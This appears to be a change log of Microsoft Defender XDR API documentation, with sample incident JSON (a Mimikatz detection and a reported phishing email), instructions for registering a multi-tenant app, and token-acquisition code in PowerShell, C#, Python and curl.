- "mailboxAddress": null,
- "clusterBy": null,
- "sender": null,
- "recipient": null,
- "subject": null,
- "deliveryAction": null,
- "securityGroupId": null,
- "securityGroupName": null,
- "registryHive": null,
- "registryKey": null,
- "registryValueType": null,
- "registryValue": null,
- "deviceId": null
- }
- ]
- }
- ]
- },
- {
- "incidentId": 924521,
- "redirectIncidentId": null,
- "incidentName": "'Mimikatz' hacktool was detected on one endpoint",
- "createdTime": "2020-09-06T12:18:03.6266667Z",
- "lastUpdateTime": "2020-09-06T12:18:03.81Z",
- "assignedTo": null,
- "classification": "Unknown",
- "determination": "NotAvailable",
- "status": "Active",
- "severity": "Low",
- "tags": [],
- "comments": [],
- "alerts": [
- {
- "alertId": "da637349914833441527_393341063",
- "incidentId": 924521,
- "serviceSource": "MicrosoftDefenderATP",
- "creationTime": "2020-09-06T12:18:03.3285366Z",
- "lastUpdatedTime": "2020-09-06T12:18:04.2566667Z",
- "resolvedTime": null,
- "firstActivity": "2020-09-06T12:15:07.7272048Z",
- "lastActivity": "2020-09-06T12:15:07.7272048Z",
- "title": "'Mimikatz' hacktool was detected",
- "description": "Readily available tools, such as hacking programs, can be used by unauthorized individuals to spy on users. When used by attackers, these tools are often installed without authorization and used to compromise targeted machines.\n\nThese tools are often used to collect personal information from browser records, record key presses, access email and instant messages, record voice and video conversations, and take screenshots.\n\nThis detection might indicate that Microsoft Defender Antivirus has stopped the tool from being installed and used effectively. However, it is prudent to check the machine for the files and processes associated with the detected tool.",
- "category": "Malware",
- "status": "New",
- "severity": "Low",
- "investigationId": null,
- "investigationState": "UnsupportedOs",
- "classification": null,
- "determination": null,
- "detectionSource": "WindowsDefenderAv",
- "assignedTo": null,
- "actorName": null,
- "threatFamilyName": "Mimikatz",
- "mitreTechniques": [],
- "devices": [
- {
- "mdatpDeviceId": "24c222b0b60fe148eeece49ac83910cc6a7ef491",
- "aadDeviceId": null,
- "deviceDnsName": "user5cx.middleeast.corp.contoso.com",
- "osPlatform": "WindowsServer2016",
- "version": "1607",
- "osProcessor": "x64",
- "osBuild": 14393,
- "healthStatus": "Active",
- "riskScore": "High",
- "rbacGroupName": "WDATP-Ring0",
- "rbacGroupId": 9,
- "firstSeen": "2020-02-06T14:16:01.9330135Z"
- }
- ],
- "entities": [
- {
- "entityType": "File",
- "sha1": "5de839186691aa96ee2ca6d74f0a38fb8d1bd6dd",
- "sha256": null,
- "fileName": "Detector.UnitTests.dll",
- "filePath": "C:\\Agent\\_work\\_temp\\Deploy_SYSTEM 2020-09-06 12_14_54\\Out",
- "processId": null,
- "processCommandLine": null,
- "processCreationTime": null,
- "parentProcessId": null,
- "parentProcessCreationTime": null,
- "ipAddress": null,
- "url": null,
- "accountName": null,
- "domainName": null,
- "userSid": null,
- "aadUserId": null,
- "userPrincipalName": null,
- "mailboxDisplayName": null,
- "mailboxAddress": null,
- "clusterBy": null,
- "sender": null,
- "recipient": null,
- "subject": null,
- "deliveryAction": null,
- "securityGroupId": null,
- "securityGroupName": null,
- "registryHive": null,
- "registryKey": null,
- "registryValueType": null,
- "registryValue": null,
- "deviceId": "24c222b0b60fe148eeece49ac83910cc6a7ef491"
- }
- ]
- }
- ]
- },
- {
- "incidentId": 924518,
- "redirectIncidentId": null,
- "incidentName": "Email reported by user as malware or phish",
- "createdTime": "2020-09-06T12:07:55.1366667Z",
- "lastUpdateTime": "2020-09-06T12:07:55.32Z",
- "assignedTo": null,
- "classification": "Unknown",
- "determination": "NotAvailable",
- "status": "Active",
- "severity": "Informational",
- "tags": [],
- "comments": [],
- "alerts": [
- {
- "alertId": "faf8edc936-85f8-a603-b800-08d8525cf099",
- "incidentId": 924518,
- "serviceSource": "OfficeATP",
- "creationTime": "2020-09-06T12:07:54.3716642Z",
- "lastUpdatedTime": "2020-09-06T12:37:40.88Z",
- "resolvedTime": null,
- "firstActivity": "2020-09-06T12:04:00Z",
- "lastActivity": "2020-09-06T12:04:00Z",
- "title": "Email reported by user as malware or phish",
- "description": "This alert is triggered when any email message is reported as malware or phish by users -V1.0.0.2",
- "category": "InitialAccess",
- "status": "InProgress",
- "severity": "Informational",
- "investigationId": null,
- "investigationState": "Queued",
- "classification": null,
- "determination": null,
- "detectionSource": "OfficeATP",
- "assignedTo": "Automation",
- "actorName": null,
- "threatFamilyName": null,
- "mitreTechniques": [],
- "devices": [],
- "entities": [
- {
- "entityType": "MailBox",
- "sha1": null,
- "sha256": null,
- "fileName": null,
- "filePath": null,
- "processId": null,
- "processCommandLine": null,
- "processCreationTime": null,
- "parentProcessId": null,
- "parentProcessCreationTime": null,
- "ipAddress": null,
- "url": null,
- "accountName": null,
- "domainName": null,
- "userSid": null,
- "aadUserId": null,
- "userPrincipalName": "testUser3@contoso.com",
- "mailboxDisplayName": "test User3",
- "mailboxAddress": "testUser3@contoso.com",
- "clusterBy": null,
- "sender": null,
- "recipient": null,
- "subject": null,
- "deliveryAction": null,
- "securityGroupId": null,
- "securityGroupName": null,
- "registryHive": null,
- "registryKey": null,
- "registryValueType": null,
- "registryValue": null,
- "deviceId": null
- },
- {
- "entityType": "MailBox",
- "sha1": null,
- "sha256": null,
- "fileName": null,
- "filePath": null,
- "processId": null,
- "processCommandLine": null,
- "processCreationTime": null,
- "parentProcessId": null,
- "parentProcessCreationTime": null,
- "ipAddress": null,
- "url": null,
- "accountName": null,
- "domainName": null,
- "userSid": null,
- "aadUserId": null,
- "userPrincipalName": "testUser4@contoso.com",
- "mailboxDisplayName": "test User4",
- "mailboxAddress": "test.User4@contoso.com",
- "clusterBy": null,
- "sender": null,
- "recipient": null,
- "subject": null,
- "deliveryAction": null,
- "securityGroupId": null,
- "securityGroupName": null,
- "registryHive": null,
- "registryKey": null,
- "registryValueType": null,
- "registryValue": null,
- "deviceId": null
- },
- {
- "entityType": "MailMessage",
- "sha1": null,
- "sha256": null,
- "fileName": null,
- "filePath": null,
- "processId": null,
- "processCommandLine": null,
- "processCreationTime": null,
- "parentProcessId": null,
- "parentProcessCreationTime": null,
- "ipAddress": null,
- "url": null,
- "accountName": null,
- "domainName": null,
- "userSid": null,
- "aadUserId": null,
- "userPrincipalName": "test.User4@contoso.com",
- "mailboxDisplayName": null,
- "mailboxAddress": null,
- "clusterBy": null,
- "sender": "user.abc@mail.contoso.co.in",
- "recipient": "test.User4@contoso.com",
- "subject": "[EXTERNAL] Attention",
- "deliveryAction": null,
- "securityGroupId": null,
- "securityGroupName": null,
- "registryHive": null,
- "registryKey": null,
- "registryValueType": null,
- "registryValue": null,
- "deviceId": null
- },
- {
- "entityType": "MailCluster",
- "sha1": null,
- "sha256": null,
- "fileName": null,
- "filePath": null,
- "processId": null,
- "processCommandLine": null,
- "processCreationTime": null,
- "parentProcessId": null,
- "parentProcessCreationTime": null,
- "ipAddress": null,
- "url": null,
- "accountName": null,
- "domainName": null,
- "userSid": null,
- "aadUserId": null,
- "userPrincipalName": null,
- "mailboxDisplayName": null,
- "mailboxAddress": null,
- "clusterBy": "Subject;P2SenderDomain;ContentType",
- "sender": null,
- "recipient": null,
- "subject": null,
- "deliveryAction": null,
- "securityGroupId": null,
- "securityGroupName": null,
- "registryHive": null,
- "registryKey": null,
- "registryValueType": null,
- "registryValue": null,
- "deviceId": null
- },
- {
- "entityType": "MailCluster",
- "sha1": null,
- "sha256": null,
- "fileName": null,
- "filePath": null,
- "processId": null,
- "processCommandLine": null,
- "processCreationTime": null,
- "parentProcessId": null,
- "parentProcessCreationTime": null,
- "ipAddress": null,
- "url": null,
- "accountName": null,
- "domainName": null,
- "userSid": null,
- "aadUserId": null,
- "userPrincipalName": null,
- "mailboxDisplayName": null,
- "mailboxAddress": null,
- "clusterBy": "Subject;SenderIp;ContentType",
- "sender": null,
- "recipient": null,
- "subject": null,
- "deliveryAction": null,
- "securityGroupId": null,
- "securityGroupName": null,
- "registryHive": null,
- "registryKey": null,
- "registryValueType": null,
- "registryValue": null,
- "deviceId": null
- },
- {
- "entityType": "MailCluster",
- "sha1": null,
- "sha256": null,
- "fileName": null,
- "filePath": null,
- "processId": null,
- "processCommandLine": null,
- "processCreationTime": null,
- "parentProcessId": null,
- "parentProcessCreationTime": null,
- "ipAddress": null,
- "url": null,
- "accountName": null,
- "domainName": null,
- "userSid": null,
- "aadUserId": null,
- "userPrincipalName": null,
- "mailboxDisplayName": null,
- "mailboxAddress": null,
- "clusterBy": "BodyFingerprintBin1;P2SenderDomain;ContentType",
- "sender": null,
- "recipient": null,
- "subject": null,
- "deliveryAction": null,
- "securityGroupId": null,
- "securityGroupName": null,
- "registryHive": null,
- "registryKey": null,
- "registryValueType": null,
- "registryValue": null,
- "deviceId": null
- },
- {
- "entityType": "MailCluster",
- "sha1": null,
- "sha256": null,
- "fileName": null,
- "filePath": null,
- "processId": null,
- "processCommandLine": null,
- "processCreationTime": null,
- "parentProcessId": null,
- "parentProcessCreationTime": null,
- "ipAddress": null,
- "url": null,
- "accountName": null,
- "domainName": null,
- "userSid": null,
- "aadUserId": null,
- "userPrincipalName": null,
- "mailboxDisplayName": null,
- "mailboxAddress": null,
- "clusterBy": "BodyFingerprintBin1;SenderIp;ContentType",
- "sender": null,
- "recipient": null,
- "subject": null,
- "deliveryAction": null,
- "securityGroupId": null,
- "securityGroupName": null,
- "registryHive": null,
- "registryKey": null,
- "registryValueType": null,
- "registryValue": null,
- "deviceId": null
- },
- {
- "entityType": "Ip",
- "sha1": null,
- "sha256": null,
- "fileName": null,
- "filePath": null,
- "processId": null,
- "processCommandLine": null,
- "processCreationTime": null,
- "parentProcessId": null,
- "parentProcessCreationTime": null,
- "ipAddress": "49.50.81.121",
- "url": null,
- "accountName": null,
- "domainName": null,
- "userSid": null,
- "aadUserId": null,
- "userPrincipalName": null,
- "mailboxDisplayName": null,
- "mailboxAddress": null,
- "clusterBy": null,
- "sender": null,
- "recipient": null,
- "subject": null,
- "deliveryAction": null,
- "securityGroupId": null,
- "securityGroupName": null,
- "registryHive": null,
- "registryKey": null,
- "registryValueType": null,
- "registryValue": null,
- "deviceId": null
- }
- ]
- }
- ]
- },
- ...
- ]
-}
-```
-
-## Related articles
--- [Use the Microsoft Graph security API - Microsoft Graph | Microsoft Learn](/graph/api/resources/security-api-overview)--- [Access the Microsoft Defender XDR APIs](api-access.md)-- [Learn about API limits and licensing](api-terms.md)-- [Understand error codes](api-error-codes.md)-- [Incidents overview](incidents-overview.md)-- [Incident APIs](api-incident.md)-- [Update incident API](api-update-incidents.md)
security Api Overview https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/api-overview.md
- Title: Overview of Microsoft Defender XDR APIs
-description: Learn about the available APIs in Microsoft Defender XDR
-
- - NOCSH
-----
- - MOE150
- - MET150
- Previously updated : 02/08/2024--
-# Overview of Microsoft Defender XDR APIs
--
-**Applies to:**
--- Microsoft Defender XDR-
-> [!NOTE]
-> **Try our new APIs using MS Graph security API**. Find out more at: [Use the Microsoft Graph security API - Microsoft Graph | Microsoft Learn](/graph/api/resources/security-api-overview).
-
-> [!IMPORTANT]
-> Some information relates to prereleased product which may be substantially modified before it's commercially released. Microsoft makes no warranties, express or implied, with respect to the information provided here.
-
-Microsoft Defender XDR is built on top of an integration-ready platform.
-
-Use the Microsoft Defender XDR APIs to automate workflows based on the shared incident and advanced hunting tables.
--- **[Combined incidents queue](api-incident.md)** - Focus on what's critical by grouping the full attack scope and all impacted assets together under the incident API.--- **[Cross-product threat hunting](api-advanced-hunting.md)** - Leverage your security team's organizational knowledge to hunt for signs of compromise, by creating your own custom queries to sift over raw data collected across multiple protection products.--- **[Event streaming API](streaming-api.md)** - Ship real-time events and alerts in a single data stream as they occur.-
-Along with these Microsoft Defender XDR-specific APIs, each of our other security products expose [additional APIs](api-articles.md) to help you take advantage of their unique capabilities.
-
-> [!NOTE]
-> The transition to the unified portal should not affect the PowerBi dashboards based on Microsoft Defender for Endpoint APIs. You can continue to work with the existing APIs regardless of the interactive portal transition.
-
-Watch this short video to learn how you can use Microsoft Defender XDR to automate workflows and integrate apps.
-> [!VIDEO https://www.microsoft.com/en-us/videoplayer/embed/RE4d73M?rel=0]
-
-## Learn more
-
-| **Understand how to access the APIs** |
-|-|
-| [Use the Microsoft Graph security API - Microsoft Graph | Microsoft Learn](/graph/api/resources/security-api-overview) |
-| [Learn about API quotas and licensing](api-terms.md) |
-| [Access the Microsoft Defender XDR APIs](api-access.md) |
-| **Build apps** |
-| [Create a 'Hello world' app](api-hello-world.md) |
-| [Create an app to access Microsoft Defender XDR APIs on behalf of a user](api-create-app-user-context.md) |
-| [Create an app to access Microsoft Defender XDR without a user](api-create-app-web.md) |
-| [Create an app with multi-tenant partner access to Microsoft Defender XDR APIs](api-partner-access.md) |
-| **Troubleshoot and maintain your apps** |
-| [Understand API error codes](api-error-codes.md) |
-| [Manage secrets in your apps with Azure Key Vault](/training/modules/manage-secrets-with-azure-key-vault/) |
-| [Implement OAuth 2.0 authorization for user sign in](/azure/active-directory/develop/active-directory-v2-protocols-oauth-code) |
security Api Partner Access https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/api-partner-access.md
- Title: Partner access through Microsoft Defender XDR APIs
-description: Learn how to create an app to get programmatic access to Microsoft Defender XDR on behalf of your users.
-
- - NOCSH
-----
- - MOE150
- - MET150
- Previously updated : 02/16/2024--
-# Create an app with partner access to Microsoft Defender XDR APIs
--
-**Applies to:**
--- Microsoft Defender XDR-
-> [!IMPORTANT]
-> Some information relates to prereleased product which may be substantially modified before it's commercially released. Microsoft makes no warranties, express or implied, with respect to the information provided here.
-
-This page describes how to create a Microsoft Entra app that has programmatic access to Microsoft Defender XDR, on behalf of users across multiple tenants. Multi-tenant apps are useful for serving large groups of users.
-
-If you need programmatic access to Microsoft Defender XDR on behalf of a single user, see [Create an app to access Microsoft Defender XDR APIs on behalf of a user](api-create-app-user-context.md). If you need access without a user explicitly defined (for example, if you're writing a background app or daemon), see [Create an app to access Microsoft Defender XDR without a user](api-create-app-web.md). If you're not sure which kind of access you need, see [Get started](api-access.md).
-
-Microsoft Defender XDR exposes much of its data and actions through a set of programmatic APIs. Those APIs help you automate workflows and make use of Microsoft Defender XDR's capabilities. This API access requires OAuth2.0 authentication. For more information, see [OAuth 2.0 Authorization Code Flow](/azure/active-directory/develop/active-directory-v2-protocols-oauth-code).
-
-In general, you'll need to take the following steps to use these APIs:
--- Create a Microsoft Entra application.-- Get an access token using this application.-- Use the token to access Microsoft Defender XDR API.-
-Since this app is multi-tenant, you'll also need [admin consent](/azure/active-directory/develop/v2-permissions-and-consent#requesting-consent-for-an-entire-tenant) from each tenant on behalf of its users.
-
-This article explains how to:
--- Create a **multi-tenant** Microsoft Entra application-- Get authorized consent from your user administrator for your application to access the Microsoft Defender XDR that resources it needs.-- Get an access token to Microsoft Defender XDR-- Validate the token-
-Microsoft Defender XDR exposes much of its data and actions through a set of programmatic APIs. Those APIs will help you automate work flows and innovate based on Microsoft Defender XDR capabilities. The API access requires OAuth2.0 authentication. For more information, see [OAuth 2.0 Authorization Code Flow](/azure/active-directory/develop/active-directory-v2-protocols-oauth-code).
-
-In general, you'll need to take the following steps to use the APIs:
--- Create a **multi-tenant** Microsoft Entra application.-- Get authorized (consent) by your user administrator for your application to access Microsoft Defender XDR resources it needs.-- Get an access token using this application.-- Use the token to access Microsoft Defender XDR API.-
-The following steps with guide you how to create a multi-tenant Microsoft Entra application, get an access token to Microsoft Defender XDR and validate the token.
-
-## Create the multi-tenant app
-
-1. Sign in to [Azure](https://portal.azure.com) as a user with the **Global Administrator** role.
-
-2. Navigate to **Microsoft Entra ID** > **App registrations** > **New registration**.
-
- :::image type="content" source="../../media/atp-azure-new-app2.png" alt-text="An application's registration section in the Microsoft Defender portal" lightbox="../../media/atp-azure-new-app2.png":::
-
-3. In the registration form:
-
- - Choose a name for your application.
- - From **Supported account types**, select **Accounts in any organizational directory (Any Microsoft Entra directory) - Multitenant**.
- - Fill out the **Redirect URI** section. Select type **Web** and give the redirect URI as **https://portal.azure.com**.
-
- After you're done filling out the form, select **Register**.
-
- :::image type="content" source="../../media/atp-api-new-app-partner.png" alt-text="An application's registration sections in the Microsoft Defender portal" lightbox="../..//media/atp-api-new-app-partner.png":::
-
-4. On your application page, select **API Permissions** > **Add permission** > **APIs my organization uses** >, type **Microsoft Threat Protection**, and select **Microsoft Threat Protection**. Your app can now access Microsoft Defender XDR.
-
- > [!TIP]
- > *Microsoft Threat Protection* is a former name for Microsoft Defender XDR, and will not appear in the original list. You need to start writing its name in the text box to see it appear.
-
- :::image type="content" source="../../media/apis-in-my-org-tab.PNG" alt-text="The APIs usage section in the Microsoft Defender portal" lightbox="../../media/apis-in-my-org-tab.PNG":::
-
-5. Select **Application permissions**. Choose the relevant permissions for your scenario (for example, **Incident.Read.All**), and then select **Add permissions**.
-
- :::image type="content" source="../../media/request-api-permissions.PNG" alt-text="An application's permission pane in the Microsoft Defender portal" lightbox="../../media/request-api-permissions.PNG":::
-
- > [!NOTE]
- > You need to select the relevant permissions for your scenario. *Read all incidents* is just an example. To determine which permission you need, please look at the **Permissions** section in the API you want to call.
- >
- > For instance, to [run advanced queries](api-advanced-hunting.md), select the 'Run advanced queries' permission; to [isolate a device](/windows/security/threat-protection/microsoft-defender-atp/isolate-machine), select the 'Isolate machine' permission.
-
-6. Select **Grant admin consent**. Every time you add a permission, you must select **Grant admin consent** for it to take effect.
-
- :::image type="content" source="../../media/grant-consent.PNG" alt-text="A section to grant admin consent in the Microsoft Defender portal" lightbox="../../media/grant-consent.PNG":::
-
-7. To add a secret to the application, select **Certificates & secrets**, add a description to the secret, then select **Add**.
-
- > [!TIP]
- > After you select **Add**, select **copy the generated secret value**. You won't be able to retrieve the secret value after you leave.
-
- :::image type="content" source="../../media/webapp-create-key2.png" alt-text="The Secret addition section in the Microsoft Defender portal" lightbox="../../media/webapp-create-key2.png":::
-
-8. Record your application ID and your tenant ID somewhere safe. They're listed under **Overview** on your application page.
-
- :::image type="content" source="../../media/app-and-tenant-ids.png" alt-text="The Overview pane in the Microsoft Defender portal" lightbox="../../media/app-and-tenant-ids.png":::
-
-9. Add the application to your user's tenant.
-
- Since your application interacts with Microsoft Defender XDR on behalf of your users, it needs be approved for every tenant on which you intend to use it.
-
- A **Global Administrator** from your user's tenant needs to view the consent link and approve your application.
-
- Consent link is of the form:
-
- ```HTTP
- https://login.microsoftonline.com/common/oauth2/authorize?prompt=consent&client_id=00000000-0000-0000-0000-000000000000&response_type=code&sso_reload=true
- ```
-
- The digits `00000000-0000-0000-0000-000000000000` should be replaced with your Application ID.
-
- After clicking on the consent link, sign in with the Global Administrator of the user's tenant and consent the application.
-
- :::image type="content" source="../../media/app-consent-partner.png" alt-text="The consent application page in the Microsoft Defender portal" lightbox="../../media/app-consent-partner.png":::
-
- You'll also need to ask your user for their tenant ID. The tenant ID is one of the identifiers used to acquire access tokens.
--- **Done!** You've successfully registered an application!-- See examples below for token acquisition and validation.-
-## Get an access token
-
-For more information on Microsoft Entra tokens, see the [Microsoft Entra tutorial](/azure/active-directory/develop/active-directory-v2-protocols-oauth-client-creds).
-
-> [!IMPORTANT]
-> Although the examples in this section encourage you to paste in secret values for testing purposes, you should **never hardcode secrets** into an application running in production. A third party could use your secret to access resources. You can help keep your app's secrets secure by using [Azure Key Vault](/azure/key-vault/general/about-keys-secrets-certificates). For a practical example of how you can protect your app, see [Manage secrets in your server apps with Azure Key Vault](/training/modules/manage-secrets-with-azure-key-vault/).
-
-> [!TIP]
-> In the following examples, use a user's tenant ID to test that the script is working.
-
-### Get an access token using PowerShell
-
-```PowerShell
-# This code gets the application context token and saves it to a file named "Latest-token.txt" under the current directory.
-
-$tenantId = '' # Paste your directory (tenant) ID here
-$clientId = '' # Paste your application (client) ID here
-$appSecret = '' # Paste your own app secret here to test, then store it in a safe place!
-
-$resourceAppIdUri = 'https://api.security.microsoft.com'
-$oAuthUri = "https://login.windows.net/$tenantId/oauth2/token"
-
-$authBody = [Ordered] @{
- resource = $resourceAppIdUri
- client_id = $clientId
- client_secret = $appSecret
- grant_type = 'client_credentials'
-}
-
-$authResponse = Invoke-RestMethod -Method Post -Uri $oAuthUri -Body $authBody -ErrorAction Stop
-$token = $authResponse.access_token
-
-Out-File -FilePath "./Latest-token.txt" -InputObject $token
-
-return $token
-```
-
-### Get an access token using C\#
-
-> [!NOTE]
-> The following code was tested with Nuget Microsoft.Identity.Client 3.19.8.
-
-> [!IMPORTANT]
-> The [Microsoft.IdentityModel.Clients.ActiveDirectory](https://www.nuget.org/packages/Microsoft.IdentityModel.Clients.ActiveDirectory) NuGet package and Azure AD Authentication Library (ADAL) have been deprecated. No new features have been added since June 30, 2020. We strongly encourage you to upgrade, see the [migration guide](/azure/active-directory/develop/msal-migration) for more details.
-
-1. Create a new console application.
-1. Install NuGet [Microsoft.Identity.Client](https://www.nuget.org/packages/Microsoft.Identity.Client/).
-1. Add the following line:
-
- ```C#
- using Microsoft.Identity.Client;
- ```
-
-1. Copy and paste the following code into your app (don't forget to update the three variables: `tenantId`, `clientId`, `appSecret`):
-
- ```C#
- string tenantId = "00000000-0000-0000-0000-000000000000"; // Paste your own tenant ID here
- string appId = "11111111-1111-1111-1111-111111111111"; // Paste your own app ID here
- string appSecret = "22222222-2222-2222-2222-222222222222"; // Paste your own app secret here for a test, and then store it in a safe place!
- const string authority = https://login.microsoftonline.com;
- const string audience = https://api.securitycenter.microsoft.com;
-
- IConfidentialClientApplication myApp = ConfidentialClientApplicationBuilder.Create(appId).WithClientSecret(appSecret).WithAuthority($"{authority}/{tenantId}").Build();
-
- List<string> scopes = new List<string>() { $"{audience}/.default" };
-
- AuthenticationResult authResult = myApp.AcquireTokenForClient(scopes).ExecuteAsync().GetAwaiter().GetResult();
-
- string token = authResult.AccessToken;
- ```
-
-### Get an access token using Python
-
-```Python
-import json
-import urllib.request
-import urllib.parse
-
-tenantId = '' # Paste your directory (tenant) ID here
-clientId = '' # Paste your application (client) ID here
-appSecret = '' # Paste your own app secret here to test, then store it in a safe place, such as the Azure Key Vault!
-
-url = "https://login.windows.net/%s/oauth2/token" % (tenantId)
-
-resourceAppIdUri = 'https://api.security.microsoft.com'
-
-body = {
- 'resource' : resourceAppIdUri,
- 'client_id' : clientId,
- 'client_secret' : appSecret,
- 'grant_type' : 'client_credentials'
-}
-
-data = urllib.parse.urlencode(body).encode("utf-8")
-
-req = urllib.request.Request(url, data)
-response = urllib.request.urlopen(req)
-jsonResponse = json.loads(response.read())
-aadToken = jsonResponse["access_token"]
-```
-
-### Get an access token using curl
-
-> [!NOTE]
-> Curl is pre-installed on Windows 10, versions 1803 and later. For other versions of Windows, download and install the tool directly from the [official curl website](https://curl.haxx.se/windows/).
-
-1. Open a command prompt, and set CLIENT_ID to your Azure application ID.
-1. Set CLIENT_SECRET to your Azure application secret.
-1. Set TENANT_ID to the Azure tenant ID of the user that wants to use your app to access Microsoft Defender XDR.
-1. Run the following command:
-
-```bash
-curl -i -X POST -H "Content-Type:application/x-www-form-urlencoded" -d "grant_type=client_credentials" -d "client_id=%CLIENT_ID%" -d "scope=https://securitycenter.onmicrosoft.com/windowsatpservice/.default" -d "client_secret=%CLIENT_SECRET%" "https://login.microsoftonline.com/%TENANT_ID%/oauth2/v2.0/token" -k
-```
-
-A successful response will look like this:
-
-```bash
-{"token_type":"Bearer","expires_in":3599,"ext_expires_in":0,"access_token":"eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsIn <truncated> aWReH7P0s0tjTBX8wGWqJUdDA"}
-```
-
-## Validate the token
-
-1. Copy and paste the token into the [JSON web token validator website, JWT,](https://jwt.ms) to decode it.
-1. Make sure that the *roles* claim within the decoded token contains the desired permissions.
-
-In the following image, you can see a decoded token acquired from an app, with ```Incidents.Read.All```, ```Incidents.ReadWrite.All```, and ```AdvancedHunting.Read.All``` permissions:
--
-<a name='use-the-token-to-access-the-microsoft-365-defender-api'></a>
-
-## Use the token to access the Microsoft Defender XDR API
-
-1. Choose the API you want to use (incidents, or advanced hunting). For more information, see [Supported Microsoft Defender XDR APIs](api-supported.md).
-2. In the http request you're about to send, set the authorization header to `"Bearer" <token>`, *Bearer* being the authorization scheme, and *token* being your validated token.
-3. The token will expire within one hour. You can send more than one request during this time with the same token.
-
-The following example shows how to send a request to get a list of incidents **using C#**.
-
-```C#
- var httpClient = new HttpClient();
- var request = new HttpRequestMessage(HttpMethod.Get, "https://api.security.microsoft.com/api/incidents");
-
- request.Headers.Authorization = new AuthenticationHeaderValue("Bearer", token);
-
- var response = httpClient.SendAsync(request).GetAwaiter().GetResult();
-```
-
-## Related articles
--- [Microsoft Defender XDR APIs overview](api-overview.md)-- [Access the Microsoft Defender XDR APIs](api-access.md)-- [Create a 'Hello world' application](api-hello-world.md)-- [Create an app to access Microsoft Defender XDR without a user](api-create-app-web.md)-- [Create an app to access Microsoft Defender XDR APIs on behalf of a user](api-create-app-user-context.md)-- [Learn about API limits and licensing](api-terms.md)-- [Understand error codes](api-error-codes.md)-- [Manage secrets in your server apps with Azure Key Vault](/training/modules/manage-secrets-with-azure-key-vault/)-- [OAuth 2.0 authorization for user sign in and API access](/azure/active-directory/develop/active-directory-v2-protocols-oauth-code)
security Api Supported https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/api-supported.md
- Title: Supported Microsoft Defender XDR APIs
-description: Supported Microsoft Defender XDR APIs
-
- - NOCSH
-----
- - MOE150
- - MET150
- Previously updated : 02/08/2024--
-# Supported Microsoft Defender XDR APIs
--
-**Applies to:**
-- Microsoft Defender XDR-
-> [!NOTE]
-> **Try our new APIs using MS Graph security API**. Find out more at: [Use the Microsoft Graph security API - Microsoft Graph | Microsoft Learn](/graph/api/resources/security-api-overview).
-
-> [!IMPORTANT]
-> Some information relates to prereleased product which may be substantially modified before it's commercially released. Microsoft makes no warranties, express or implied, with respect to the information provided here.
-
-## List of available APIs
-
-Article | Description
--|-
-[Advanced Hunting API](api-advanced-hunting.md) | Run Advanced Hunting queries.
-[Incident APIs](api-incident.md) | List and update incidents, along with other practical tasks.
-[Streaming API](streaming-api.md) | Ship real-time events and alerts as they occur in a single data stream.
-
-### Endpoint URIs
-
-The base URI for both of the main APIs is: https://api.security.microsoft.com. For better performance, use a server closer to your geolocation:
--- The United States: api-us.security.microsoft.com-- Europe: api-eu.security.microsoft.com-- The United Kingdom: api-uk.security.microsoft.com-
-Tokens can be acquired by accessing https://api.security.microsoft.com.
-
-All APIs along the `/api` path use the [OData](/odata/overview) Protocol; for example, https://api.security.microsoft.com/api/incidents.
-
-## Related articles
--- [Use the Microsoft Graph security API - Microsoft Graph | Microsoft Learn](/graph/api/resources/security-api-overview)--- [Microsoft Defender XDR APIs overview](api-overview.md)-- [Access the Microsoft Defender XDR APIs](api-access.md)-- [Streaming API](../defender-endpoint/raw-data-export.md)-- [Learn about API limits and licensing](api-terms.md)-- [Understand error codes](api-error-codes.md)
security Api Update Incidents https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/api-update-incidents.md
- Title: Update incident API
-description: Learn how to update incidents using Microsoft Defender XDR API
-
- - NOCSH
-----
- - MOE150
- - MET150
- Previously updated : 04/09/2024--
-# Update incidents API
--
-**Applies to:**
--- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> [!NOTE]
-> **Try our new APIs using MS Graph security API**. Find out more at: [Use the Microsoft Graph security API - Microsoft Graph | Microsoft Learn](/graph/api/resources/security-api-overview). For information about the new _update incident_ API using MS Graph security API, see [Update incident](/graph/api/security-incident-update).
-
-> [!IMPORTANT]
-> Some information relates to prereleased product which may be substantially modified before it's commercially released. Microsoft makes no warranties, express or implied, with respect to the information provided here.
-
-## API description
-
-Updates properties of existing incident. Updatable properties are: `status`, `determination`, `classification`, `assignedTo`, `tags`, and `comments`.
-
-### Quotas, resource allocation, and other constraints
-
-1. You can make up to 50 calls per minute or 1,500 calls per hour before you hit the throttling threshold.
-2. You can set the `determination` property only if `classification` is set to TruePositive.
-
-If your request is throttled, it returns a `429` response code. The response body indicates the time when you can begin making new calls.
-
-## Permissions
-
-One of the following permissions is required to call this API. To learn more, including how to choose permissions, see [Access the Microsoft Defender XDR APIs](api-access.md).
-
-Permission type|Permission|Permission display name
-||
-Application|Incident.ReadWrite.All|Read and write all incidents
-Delegated (work or school account)|Incident.ReadWrite|Read and write incidents
-
-> [!NOTE]
-> When obtaining a token using user credentials, the user needs to have permission to update the incident in the portal.
-
-## HTTP request
-
-```HTTP
-PATCH /api/incidents/{id}
-```
-
-## Request headers
-
-Name|Type|Description
-||
-Authorization|String|Bearer {token}. **Required**.
-Content-Type|String|application/json. **Required**.
-
-## Request body
-
-In the request body, supply the values for the fields that should be updated. Existing properties that aren't included in the request body maintain their values, unless they have to be recalculated due to changes to related values. For best performance, you should omit existing values that didn't change.
-
-Property|Type|Description
-||
-status|Enum|Specifies the current status of the incident. Possible values are: `Active`, `Resolved`, `InProgress`, and `Redirected`.
-assignedTo|string|Owner of the incident.
-classification|Enum|Specification of the incident. Possible values are: `TruePositive` (True positive), `InformationalExpectedActivity` (Informational, expected activity), and `FalsePositive` (False Positive).
